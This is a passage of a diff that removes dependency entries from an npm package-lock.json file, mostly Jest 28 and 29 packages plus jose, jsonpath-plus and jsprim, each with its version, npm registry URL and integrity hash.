"peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - } - }, - "@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinonjs/commons": "^1.7.0" - } - }, - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true - }, - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true - }, - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "requires": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - } - }, - "diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true - }, - "emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true - }, - "expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*" - } - }, - "jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - } - }, - "jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - } - }, - "jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - } - }, - "jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "requires": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - } - }, - "resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha1-nbe1lJatPzz+8wp1FC0tkwrXJlE=", - "dev": true, - "peer": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - } - }, - "lines-and-columns": { - "version": "1.1.6", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.1.6.tgz", - "integrity": "sha1-HADHQ7QzzQpOgHWPe2SldEDZ/wA=", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.clonedeep": { - "version": "4.5.0", - "resolved": 